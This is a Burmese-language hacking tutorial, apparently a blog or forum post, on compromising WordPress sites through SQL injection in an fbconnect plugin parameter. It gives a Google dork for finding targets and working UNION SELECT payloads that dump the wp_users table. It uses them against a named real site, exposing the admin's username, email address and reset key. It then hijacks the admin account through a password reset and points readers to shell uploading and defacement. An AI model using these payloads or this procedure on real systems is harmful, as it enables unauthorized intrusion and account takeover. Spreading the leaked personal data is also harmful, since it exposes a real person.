WP ကုိ ဟက္ခ်င္ပါတဲ့ဆုိတဲ့ညီအကုိမ်ားအတြက္ ဒီပုိ႔စ္ေလးကအေထာက္အကူျပဳမယ္ထင္ပါတယ္။ ဒီပုိ႔စ္ကနည္းအတုိင္းမလုပ္ခင္ SQL Injection အေၾကာင္းနည္းနည္းပါးပါးနားလည္ရင္ေတာ့ ေကာင္းမယ္ဗ်။ ဘာလုိ႔လဲဆုိေတာ့ ကြ်န္ေတာ္ကုိနည္းေျပာျပေနတဲ့အခ်ိန္မွာ မလုပ္ဖူးေတာ့ ေတာ္ေတာ္ေခါင္းစားလုိ႔ပါ။ အေျခမခုိင္ေတာ့ ဟီး ကဲဗ်ာ ဒီေန႔ေတာ့ ကြ်န္ေတာ္ ဆရာတစ္ေယာက္ေျပာျပတဲ့နည္းကုိ ျပန္ရွယ္ေပးလုိက္ပါတယ္။ wp ကုိဟက္ခ်င္တယ္ေျပာတဲ့ ညီအကုိမ်ားအတြက္ပါ။ (မ်ဳိးၾကီးေလသံျဖင့္ :D) ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ vul ျဖစ္ေနတဲ့ ဆုိဒ္ေတြကုိရွာရပါမယ္။ ဒီေတာ့ Google မွာေအာက္က Dork ေလးနဲ႔အရင္ရွာလုိက္ပါ။
Dork:
inurl:"fbconnect_action=myhome"
ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။
sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။
Stato:
Nome: 10
Membro da: 7
Website URL: 6
ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့
sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--
ျဖစ္ပါတယ္။ In my case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- ဒီေနရာမွာ
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()-- ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။
ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။
sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--
ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။
Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6
ဒီေတာ့ Username က Rudy, email address က r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။
http://www.wildwind.it/wp-admin/
ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။
ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ျပီးရင္ ေစာေစာက မွတ္ထားတာေလး ျပန္ၾကည့္မယ္။ အဲဒီမွာ user name က Rudy, Activation key က hSTGEM9iWvnryRgJL6tz ျဖစ္ပါတယ္။
ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။
http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username
ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။
www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy
အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။
ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။
ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin
Bravo! I'm in :D
ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့
ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။ Deface တင္နည္းကုိလည္း
ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။
Special Thanks to:
$0m30n3 (BMH)